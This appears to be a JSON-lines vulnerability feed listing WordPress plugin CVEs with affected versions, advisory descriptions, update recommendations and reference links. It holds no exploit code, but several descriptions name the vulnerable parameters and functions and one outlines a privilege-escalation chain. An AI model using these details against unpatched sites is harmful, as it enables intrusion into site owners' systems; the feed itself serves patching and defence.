{"CVE_ID":"CVE-2025-3740","slug":"school-management","versionImpact":"93.1.0","versionEndExcluding":"1.93.1 (02-07-2025)","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 93.1.0 via the 'page' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The Local File Inclusion exploit can be chained to include various dashboard view files in the plugin. One such chain can be leveraged to update the password of Super Administrator accounts in Multisite environments making privilege escalation possible. The vendor has updated the version numbers beginning with `1.93.1 (02-07-2025)` for the patched version. This version comes after version 93.1.0.","recommendation":"Update to version 1.93.1 (02-07-2025), or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032#item-description__update-history\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032#item-description__update-history\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3604aece-5e76-4e8e-9caf-f518d6001277?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3604aece-5e76-4e8e-9caf-f518d6001277?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10877","slug":"advanced-form-integration","versionImpact":"1.92.0","versionEndExcluding":"1.92.1","description":"The AFI \u2013 The Easiest Integration Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.92.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.92.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/936de04d-9b80-430b-a8b7-9755b68e2a02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/936de04d-9b80-430b-a8b7-9755b68e2a02?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/tags\\\/1.91.4\\\/includes\\\/class-adfoin-log-table.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-form-integration\\\/tags\\\/1.91.4\\\/includes\\\/class-adfoin-log-table.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185778\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185778\\\/advanced-form-integration\\\/trunk\\\/includes\\\/class-adfoin-log-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13430","slug":"pagelayer","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.8 via the 'pagelayer_builder_posts_shortcode' function due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private posts that they should not have access to.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252081\\\/pagelayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252081\\\/pagelayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de8da4c-dee7-4d59-a475-a969008aa0d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de8da4c-dee7-4d59-a475-a969008aa0d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4874","slug":"bricksbuilder","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"The Bricks Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.9.8 via the postId parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify posts and pages created by other users including admins. As a requirement for this, an admin would have to enable access to the editor specifically for such a user or enable it for all users with a certain user account type.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d63e898-43e5-42b5-96b6-1453352e0cae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d63e898-43e5-42b5-96b6-1453352e0cae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bricksbuilder.io\\\/release\\\/bricks-1-9-9\\\/#access-control-fix-for-user-role-contributor\",\"name\":\"https:\\\/\\\/bricksbuilder.io\\\/release\\\/bricks-1-9-9\\\/#access-control-fix-for-user-role-contributor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35738","slug":"chatbot-chatgpt","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Kognetiks Kognetiks Chatbot for WordPress allows Stored XSS.This issue affects Kognetiks Chatbot for WordPress: from n\/a through 1.9.8.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-1-9-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/chatbot-chatgpt\\\/wordpress-kognetiks-chatbot-for-wordpress-plugin-1-9-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1891","slug":"helpie-faq","versionEndExcluding":"1.9.9","description":"The Accordion & FAQ WordPress plugin before 1.9.9 does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5d993f-cc20-4b5f-b4c8-c13004151828\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5d993f-cc20-4b5f-b4c8-c13004151828\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1926","slug":"pagelayer","versionImpact":"1.9.8","versionEndExcluding":"1.9.9","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.8. This is due to missing or incorrect nonce validation on the pagelayer_save_post function. This makes it possible for unauthenticated attackers to modify post contents via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/1.9.8\\\/init.php#L477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/1.9.8\\\/init.php#L477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/542b6312-b264-49d5-882a-454427c60c8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/542b6312-b264-49d5-882a-454427c60c8a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4542","slug":"compact-wp-audio-player","versionEndExcluding":"1.9.8","description":"The Compact WP Audio Player WordPress plugin before 1.9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0bef96f-dfe2-4988-adf8-e1bd493c5242\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f0bef96f-dfe2-4988-adf8-e1bd493c5242\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10475","slug":"lead-form-builder","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Responsive Contact Form Builder & Lead Generation Plugin WordPress plugin before 1.9.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faca59fb-6b59-45b0-8b97-c4125d9d3cb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/faca59fb-6b59-45b0-8b97-c4125d9d3cb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1950","slug":"woo-product-carousel-slider-and-grid-ultimate","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Product Carousel Slider & Grid Ultimate for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.7 via deserialization of untrusted input via shortcode. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed8636bf-229a-42a5-a19c-332679613dd2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-meta-box.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7\\\/includes\\\/classes\\\/class-meta-box.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7&old=3045923&new_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.8&new=3045923&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.7&old=3045923&new_path=\\\/woo-product-carousel-slider-and-grid-ultimate\\\/tags\\\/1.9.8&new=3045923&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12268","slug":"responsive-block-editor-addons","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Responsive Blocks \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'responsive-block-editor-addons\/portfolio' block in all versions up to, and including, 1.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208350\\\/responsive-block-editor-addons\\\/tags\\\/1.9.8\\\/src\\\/blocks\\\/portfolio\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208350\\\/responsive-block-editor-addons\\\/tags\\\/1.9.8\\\/src\\\/blocks\\\/portfolio\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e951b97-3d17-4360-8fec-393e2f0c13d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e951b97-3d17-4360-8fec-393e2f0c13d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6751","slug":"hostinger","versionImpact":"1.9.7","versionEndExcluding":"1.9.8","description":"The Hostinger plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the function publish_website in all versions up to, and including, 1.9.7. This makes it possible for unauthenticated attackers to enable and disable maintenance mode.","recommendation":"Update to version 1.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d89cf759-5e5f-43e2-90a9-a8e554653ee1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d89cf759-5e5f-43e2-90a9-a8e554653ee1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010008%40hostinger%2Ftrunk&old=3010004%40hostinger%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010008%40hostinger%2Ftrunk&old=3010004%40hostinger%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11455","slug":"include-mastodon-feed","versionImpact":"1.9.4","versionEndExcluding":"1.9.6","description":"The Include Mastodon Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'include-mastodon-feed' shortcode in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/include-mastodon-feed\\\/tags\\\/1.9.5\\\/plugin.php#L730\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/include-mastodon-feed\\\/tags\\\/1.9.5\\\/plugin.php#L730\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ed075f2-778a-49f5-bd6e-439cd3f1cee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ed075f2-778a-49f5-bd6e-439cd3f1cee6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11280","slug":"password-protect-page","versionImpact":"1.9.5","versionEndExcluding":"1.9.6","description":"The PPWP \u2013 Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.5 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 1.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208393\\\/password-protect-page\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208393\\\/password-protect-page\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ac0d84-dff4-4a03-a530-cac47ffaf2bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9ac0d84-dff4-4a03-a530-cac47ffaf2bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3794","slug":"wpforms-lite","versionImpact":"1.9.5","versionEndExcluding":"1.9.5.1","description":"The WPForms \u2013 Easy Form Builder for WordPress \u2013 Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the start_timestamp parameter in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.4.2\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L3154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpforms-lite\\\/tags\\\/1.9.4.2\\\/assets\\\/js\\\/frontend\\\/wpforms.js#L3154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/179eb680-e8d8-4918-96e3-e67217771c29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/179eb680-e8d8-4918-96e3-e67217771c29?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4955","slug":"tarteaucitronjs","versionImpact":"1.9.4","versionEndExcluding":"1.9.5","description":"The tarteaucitron.io WordPress plugin before 1.9.5 uses query parameters from YouTube oEmbed URLs without sanitizing these parameters correctly, which could allow users with the contributor role and above to perform Stored Cross-site Scripting attacks.","recommendation":"Update to version 1.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b84a73a4-7e9b-4994-a9bb-ad47f7cf45da\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b84a73a4-7e9b-4994-a9bb-ad47f7cf45da\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12184","slug":"contact-forms","versionImpact":"1.9.4","versionEndExcluding":"1.9.5","description":"The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the accua_forms_download_submitted_file() function in all versions up to, and including, 1.9.4. This makes it possible for unauthenticated attackers to download other user submitted forms.","recommendation":"Update to version 1.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231363%40contact-forms&new=3231363%40contact-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231363%40contact-forms&new=3231363%40contact-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232168%40contact-forms&new=3232168%40contact-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232168%40contact-forms&new=3232168%40contact-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/695df547-f068-4ac1-926f-80dbf75632dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/695df547-f068-4ac1-926f-80dbf75632dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36666","slug":"directory-pro","versionEndExcluding":"1.9.5","description":"The directory-pro WordPress plugin before 1.9.5, final-user-wp-frontend-user-profiles WordPress plugin before 1.2.2, producer-retailer WordPress plugin through TODO, photographer-directory WordPress plugin before 1.0.9, real-estate-pro WordPress plugin before 1.7.1, institutions-directory WordPress plugin before 1.3.1, lawyer-directory WordPress plugin before 1.2.9, doctor-listing WordPress plugin before 1.3.6, Hotel Listing WordPress plugin before 1.3.7, fitness-trainer WordPress plugin before 1.4.1, wp-membership WordPress plugin before 1.5.7, sold by the same developer (e-plugins), do not implementing any security measures in some AJAX calls. For example in the file plugin.php, the function iv_directories_update_profile_setting() uses update_user_meta with any data provided by the ajax call, which can be used to give the logged in user admin capabilities. Since the plugins allow user registration via a custom form (even if the blog does not allow users to register) it makes any site using it vulnerable.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d079cb16-ead5-4bc8-b0b8-4a4dc2a54c96\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d079cb16-ead5-4bc8-b0b8-4a4dc2a54c96\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/user\\\/e-plugins\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/user\\\/e-plugins\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10770","slug":"envo-extra","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The Envo Extra plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.3 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08b0f5e0-f68a-4fea-9d62-468956012a6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08b0f5e0-f68a-4fea-9d62-468956012a6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182181%40envo-extra&new=3182181%40envo-extra&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182181%40envo-extra&new=3182181%40envo-extra&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13306","slug":"gmap-embed","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The Maps Plugin using Google Maps for WordPress  WordPress plugin before 1.9.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec3096f2-60fd-4654-9e95-5cf4b20b2990\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ec3096f2-60fd-4654-9e95-5cf4b20b2990\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13208","slug":"gmap-embed","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The Maps Plugin using Google Maps for WordPress  WordPress plugin before 1.9.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f86d4f64-208f-407f-8d2c-a89b5e0ac777\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f86d4f64-208f-407f-8d2c-a89b5e0ac777\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7809","slug":"streamweasels-twitch-integration","versionImpact":"1.9.3","versionEndExcluding":"1.9.4","description":"The StreamWeasels Twitch Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'data-uuid' attribute in all versions up to, and including, 1.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-public.js#L1349\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/streamweasels-twitch-integration\\\/trunk\\\/public\\\/js\\\/streamweasels-public.js#L1349\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eed5b1ea-213c-4a37-b357-8d058af86d38?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eed5b1ea-213c-4a37-b357-8d058af86d38?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1121","slug":"advanced-forms","versionImpact":"1.9.3.2","versionEndExcluding":"1.9.3.3","description":"The Advanced Forms for ACF plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_json_file() function in all versions up to, and including, 1.9.3.2. This makes it possible for unauthenticated attackers to export form settings.","recommendation":"Update to version 1.9.3.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7b33f2ee-3f20-4494-bdae-3f8cc3c6dc73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031007%40advanced-forms&new=3031007%40advanced-forms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4088","slug":"attire-blocks","versionImpact":"1.9.2","versionEndExcluding":"1.9.3","description":"The Gutenberg Blocks and Page Layouts \u2013 Attire Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the disable_fe_assets function in all versions up to, and including, 1.9.2. This makes it possible for authenticated attackers, with subscriber access or above, to change the plugin's settings. Additionally, no nonce check is performed resulting in a CSRF vulnerability.","recommendation":"Update to version 1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef47feb7-76fd-470d-ba48-55ba3c323c6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef47feb7-76fd-470d-ba48-55ba3c323c6d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085600\\\/attire-blocks\\\/trunk\\\/admin\\\/AttireBlocksSettings.php?old=2996841&old_path=attire-blocks%2Ftrunk%2Fadmin%2FAttireBlocksSettings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085600\\\/attire-blocks\\\/trunk\\\/admin\\\/AttireBlocksSettings.php?old=2996841&old_path=attire-blocks%2Ftrunk%2Fadmin%2FAttireBlocksSettings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6505","slug":"prime-mover","versionImpact":"1.9.2","versionEndExcluding":"1.9.3","description":"The Migrate WordPress Website & Backups WordPress plugin before 1.9.3 does not prevent directory listing in sensitive directories containing export files.","recommendation":"Update to version 1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eca6f099-6af0-4f42-aade-ab61dd792629\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eca6f099-6af0-4f42-aade-ab61dd792629\",\"refsource\":\"\",\"tags\":[]}]"}
